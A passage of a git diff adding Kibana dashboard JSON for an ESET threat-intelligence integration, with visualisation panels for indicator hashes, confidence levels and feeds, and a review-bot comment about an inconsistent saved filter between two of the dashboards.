true, + "label": "Top values of threat.indicator.confidence", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "67920793-58db-49b6-aca9-273945fffbce", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.confidence" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "08036a92-d500-4966-98ca-feff7f9ecb36", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "67920793-58db-49b6-aca9-273945fffbce" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "8420f9ae-7160-4255-92de-88c4bb1a58c9", + "w": 13, + "x": 8, + "y": 0 + }, + "panelIndex": "8420f9ae-7160-4255-92de-88c4bb1a58c9", + "title": "Confidence Levels", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f2027bff-c26e-4f79-9a95-1903f4845032": { + "columnOrder": [ + "3571d718-049f-40ef-8f42-43c58e9e3a76" + ], + "columns": { + "3571d718-049f-40ef-8f42-43c58e9e3a76": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA1", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": 
"threat.indicator.file.hash.sha1" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "3571d718-049f-40ef-8f42-43c58e9e3a76", + "layerId": "f2027bff-c26e-4f79-9a95-1903f4845032", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "022ad52f-3c7e-4509-ac6a-05977f25d523", + "w": 9, + "x": 21, + "y": 0 + }, + "panelIndex": "022ad52f-3c7e-4509-ac6a-05977f25d523", + "title": "Unique SHA1", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f2027bff-c26e-4f79-9a95-1903f4845032": { + "columnOrder": [ + "3571d718-049f-40ef-8f42-43c58e9e3a76" + ], + "columns": { + "3571d718-049f-40ef-8f42-43c58e9e3a76": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique MD5", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.md5" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "3571d718-049f-40ef-8f42-43c58e9e3a76", + "layerId": 
"f2027bff-c26e-4f79-9a95-1903f4845032", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "45860e3d-e2d0-4235-9e4a-0b39ef9d7b31", + "w": 9, + "x": 30, + "y": 0 + }, + "panelIndex": "45860e3d-e2d0-4235-9e4a-0b39ef9d7b31", + "title": "Unique MD5", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f2027bff-c26e-4f79-9a95-1903f4845032": { + "columnOrder": [ + "3571d718-049f-40ef-8f42-43c58e9e3a76" + ], + "columns": { + "3571d718-049f-40ef-8f42-43c58e9e3a76": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA256", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha256" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "3571d718-049f-40ef-8f42-43c58e9e3a76", + "layerId": "f2027bff-c26e-4f79-9a95-1903f4845032", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "4c2ca71b-c123-4c51-b2e3-e57f50ea0f61", + "w": 9, + "x": 39, + "y": 0 + }, + "panelIndex": 
"4c2ca71b-c123-4c51-b2e3-e57f50ea0f61", + "title": "Unique SHA256", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6c4a95f2-3075-4c44-9fff-40181d8cce3f": { + "columnOrder": [ + "36f43d23-f250-4744-a941-bbe07de60f42", + "72db0f24-0ba3-4ffc-a6cd-7cc80909757f", + "1ba9e8df-59e9-44b5-84a8-498f18b8e825" + ], + "columns": { + "1ba9e8df-59e9-44b5-84a8-498f18b8e825": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "36f43d23-f250-4744-a941-bbe07de60f42": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1ba9e8df-59e9-44b5-84a8-498f18b8e825", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "72db0f24-0ba3-4ffc-a6cd-7cc80909757f": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + 
"query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1ba9e8df-59e9-44b5-84a8-498f18b8e825" + ], + "layerId": "6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "36f43d23-f250-4744-a941-bbe07de60f42", + "xAccessor": "72db0f24-0ba3-4ffc-a6cd-7cc80909757f" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 11, + "i": "75d9ea51-d5d6-44b4-8aeb-d7068984118f", + "w": 19, + "x": 8, + "y": 10 + }, + "panelIndex": "75d9ea51-d5d6-44b4-8aeb-d7068984118f", + "title": "Indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a53a8936-8b0c-4a8f-9f78-bdbc17f69195", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a53a8936-8b0c-4a8f-9f78-bdbc17f69195": { + "columnOrder": [ + "e174c003-d874-4335-a5d1-cc32b563584a", + "fd2cc2ea-6e8a-4a24-b0b9-42c227797012" + ], + "columns": { + "e174c003-d874-4335-a5d1-cc32b563584a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top values by description", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + 
"includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "fd2cc2ea-6e8a-4a24-b0b9-42c227797012", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "threat.indicator.description" + ], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "fd2cc2ea-6e8a-4a24-b0b9-42c227797012": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "e174c003-d874-4335-a5d1-cc32b563584a", + "isTransposed": false, + "oneClickFilter": true + }, + { + "columnId": "fd2cc2ea-6e8a-4a24-b0b9-42c227797012", + "isTransposed": false + } + ], + "layerId": "a53a8936-8b0c-4a8f-9f78-bdbc17f69195", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "de263cf5-ac36-416c-962e-202a26348380", + "w": 21, + "x": 27, + "y": 10 + }, + "panelIndex": "de263cf5-ac36-416c-962e-202a26348380", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs ESET] Files", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-23T11:27:54.389Z", + "id": "ti_eset-4fc91930-819a-11ee-a704-a3364df0a052", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"8420f9ae-7160-4255-92de-88c4bb1a58c9:indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "022ad52f-3c7e-4509-ac6a-05977f25d523:indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "45860e3d-e2d0-4235-9e4a-0b39ef9d7b31:indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4c2ca71b-c123-4c51-b2e3-e57f50ea0f61:indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "75d9ea51-d5d6-44b4-8aeb-d7068984118f:indexpattern-datasource-layer-6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "de263cf5-ac36-416c-962e-202a26348380:indexpattern-datasource-layer-a53a8936-8b0c-4a8f-9f78-bdbc17f69195", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_bec9c1a6-faec-4fed-898d-24bc09666953:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "name": "tag-ref-ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "type": "tag" + }, + { + "id": "ti_eset-security-solution-default", + "name": "tag-ref-ti_eset-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/dashboard/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/dashboard/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..8b7657be60d --- /dev/null +++ b/packages/ti_eset/kibana/dashboard/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052.json 
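Review bot: The Files dashboard's saved filter (the `combined` filter under `kibanaSavedObjectMeta.searchSourceJSON`) restricts on `event.kind`, `_index` and `threat.indicator.type: file` but, unlike the sibling "Other indicators" dashboard added in the next file, does not carry the negated `exists` filter on `error.message`; documents that failed ingest processing would therefore be counted in the "Unique SHA1/MD5/SHA256" metrics and the feed table on this page but excluded on the other. If that difference is not intentional, add the same filter entry here — `{"meta": {"field": "error.message", "key": "error.message", "negate": true, "type": "exists", "value": "exists", ...}, "query": {"exists": {"field": "error.message"}}}` — as a fourth `params` element so all four dashboards agree on what an "indicator" is. Separately, only the first `params` entry of this filter carries a `$state` block while the other two omit it, whereas the sibling dashboard sets it on every entry; this looks like an export inconsistency rather than a functional difference, but aligning it would keep the two files diff-friendly.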
@@ -0,0 +1,993 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"83a17707-4eb4-41a9-beaa-e72e260453b2\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"83a17707-4eb4-41a9-beaa-e72e260453b2\",\"fieldName\":\"data_stream.dataset\",\"title\":\"Feed name\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "logs-*", + "key": "threat.indicator.type", + "negate": true, + "params": [ + "domain-name", + "file", + "ipv4-addr", + "url" + ], + "type": "phrases", + "value": [ + "domain-name", + "file", + "ipv4-addr", + "url" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "threat.indicator.type": "domain-name" + } + }, + { + "match_phrase": { + "threat.indicator.type": "file" + } + }, + { + "match_phrase": { + "threat.indicator.type": "ipv4-addr" + } + }, + { + "match_phrase": { + "threat.indicator.type": "url" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + 
"meta": { + "alias": null, + "disabled": false, + "field": "_index", + "index": "logs-*", + "key": "_index", + "negate": false, + "params": { + "query": "logs-ti_eset_latest.*" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "_index": "logs-ti_eset_latest.*" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "error.message", + "index": "logs-*", + "key": "error.message", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "error.message" + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### ESET Threat Intelligence\n**Navigation**\n\n- [Overview](/app/dashboards#/view/ti_eset-f608e350-8192-11ee-a704-a3364df0a052)\n- [Domains, URL, IP](/app/dashboards#/view/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052)\n- [Files](/app/dashboards#/view/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052)\n- **[Other indicators (This page)](/app/dashboards#/view/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052)**\n\n[Integrations Page](/app/integrations/detail/ti_eset/overview)\n\nThis dashboard displays information about all remaining indicator types ingested from the ESET Threat Intelligence integration.\nThis includes x509 certificates, email addresses and others.\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 21, + "i": "9cdb7509-554b-438e-9749-fd650fa684e3", + 
"w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "9cdb7509-554b-438e-9749-fd650fa684e3", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "eba6f3ca-af23-403f-8828-7c7a11af1337": { + "columnOrder": [ + "b2694625-806e-4d4d-b96a-0b3ea2037123" + ], + "columns": { + "b2694625-806e-4d4d-b96a-0b3ea2037123": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total indicators", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b2694625-806e-4d4d-b96a-0b3ea2037123", + "colorMode": "Labels", + "layerId": "eba6f3ca-af23-403f-8828-7c7a11af1337", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#ff5d5d", + "stop": null + }, + { + "color": "#005e4f", + "stop": 1 + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#ff5d5d", + "stop": 1 + }, + { + "color": "#005e4f", + "stop": 81780 + } + ] + }, + "type": "palette" + }, + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + 
"gridData": { + "h": 8, + "i": "3b89b235-df4c-4068-8a24-6426797a082d", + "w": 8, + "x": 8, + "y": 0 + }, + "panelIndex": "3b89b235-df4c-4068-8a24-6426797a082d", + "title": "Total indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e90d8bf4-3571-4bce-9ab0-548c27b3137b": { + "columnOrder": [ + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29", + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26" + ], + "columns": { + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + 
"e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "36f43892-5ab9-4234-bc5d-234e6e70ab89", + "w": 10, + "x": 16, + "y": 0 + }, + "panelIndex": "36f43892-5ab9-4234-bc5d-234e6e70ab89", + "title": "Indicators by type", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "08036a92-d500-4966-98ca-feff7f9ecb36": { + "columnOrder": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15", + "67920793-58db-49b6-aca9-273945fffbce" + ], + "columns": { + "67920793-58db-49b6-aca9-273945fffbce": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "99f24050-c517-46ff-85b1-f3ceea4c9e15": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.confidence", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "67920793-58db-49b6-aca9-273945fffbce", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.confidence" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "08036a92-d500-4966-98ca-feff7f9ecb36", + "layerType": "data", 
+ "legendDisplay": "show", + "metrics": [ + "67920793-58db-49b6-aca9-273945fffbce" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "e35a1652-3081-4545-a3ef-db0ac8b9b680", + "w": 10, + "x": 26, + "y": 0 + }, + "panelIndex": "e35a1652-3081-4545-a3ef-db0ac8b9b680", + "title": "Confidence Levels", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bb3bb9c5-ae3e-4b2e-9c1b-ec0a24c9b7d1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bb3bb9c5-ae3e-4b2e-9c1b-ec0a24c9b7d1": { + "columnOrder": [ + "145e9150-c82c-4521-b626-465fd6051bc0", + "22fbe26b-4375-4805-9400-f7377d5a8ff2" + ], + "columns": { + "145e9150-c82c-4521-b626-465fd6051bc0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.indicator.email.address", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "22fbe26b-4375-4805-9400-f7377d5a8ff2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.email.address" + }, + "22fbe26b-4375-4805-9400-f7377d5a8ff2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + 
}, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "145e9150-c82c-4521-b626-465fd6051bc0", + "isTransposed": false, + "oneClickFilter": false + }, + { + "columnId": "22fbe26b-4375-4805-9400-f7377d5a8ff2", + "isTransposed": false + } + ], + "layerId": "bb3bb9c5-ae3e-4b2e-9c1b-ec0a24c9b7d1", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "b4844f80-8d75-4bdb-bba7-9ca56cec45d7", + "w": 12, + "x": 36, + "y": 0 + }, + "panelIndex": "b4844f80-8d75-4bdb-bba7-9ca56cec45d7", + "title": "Unique email addresses", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-4cf2e420-ecde-40bc-b31e-13c949179835", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "4cf2e420-ecde-40bc-b31e-13c949179835": { + "columnOrder": [ + "dbf0d15d-41f8-4c67-8ba7-010a8d300f47", + "287130d2-0132-418b-8df1-54aaf692e213", + "709a13b8-d71b-4339-96a9-26af5c0873fd" + ], + "columns": { + "287130d2-0132-418b-8df1-54aaf692e213": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "709a13b8-d71b-4339-96a9-26af5c0873fd": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "dbf0d15d-41f8-4c67-8ba7-010a8d300f47": 
{ + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "709a13b8-d71b-4339-96a9-26af5c0873fd", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "709a13b8-d71b-4339-96a9-26af5c0873fd" + ], + "layerId": "4cf2e420-ecde-40bc-b31e-13c949179835", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "dbf0d15d-41f8-4c67-8ba7-010a8d300f47", + "xAccessor": "287130d2-0132-418b-8df1-54aaf692e213" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + 